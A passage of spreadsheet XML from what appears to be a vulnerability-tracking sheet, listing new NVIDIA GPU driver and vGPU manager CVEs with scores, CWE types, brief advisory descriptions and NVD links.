      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Virtual GPU Manager contains a vulnerability in the GPU System Processor (GSP) tracing component where a guest VM user may cause improper access by sending crafted data through a shared buffer. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47497</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47498</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Manager contains a vulnerability in the GPU System Processor (GSP) plugin where a guest VM user may cause an out-of-bounds write by sending a specially crafted RPC message. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47498</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47499</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Windows and Linux contains a vulnerability in the kernel mode layer where a guest could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47499</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47500</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where improper cleanup of reference counts during error paths could lead to a use-after-free condition. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47500</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47501</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could cause an out-of-bounds write by supplying mismatched memory buffers during event buffer setup. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47501</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47502</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Windows and Linux contains a vulnerability in the kernel mode layer, where a guest user could cause an integer overflow leading to memory corruption. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47502</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47503</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where a guest VM user may cause an out-of-bounds write by sending a crafted RPC message with invalid performance state list size parameters. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47503</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47504</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Linux GPU Display Driver contains a vulnerability in the NGX updater where an outdated embedded cryptographic library is susceptible to type confusion. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, or data tampering.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47504</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47505</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer where an attacker could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, denial of service, or escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47505</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47507</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an out-of-bounds array access. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47507</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47508</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an incorrect conversion between numeric types. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47508</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47510</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an integer overflow leading to an out-of-bounds write to GPU memory. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47510</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47511</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver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156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47511</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47512</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an out-of-bounds read leading to kernel information disclosure. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47512</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47513</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an out-of-bounds read from kernel heap memory. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47513</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47514</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause exposure of kernel stack contents including return addresses and pointers. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47514</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47516</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability where an unprivileged user could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47516</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47519</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
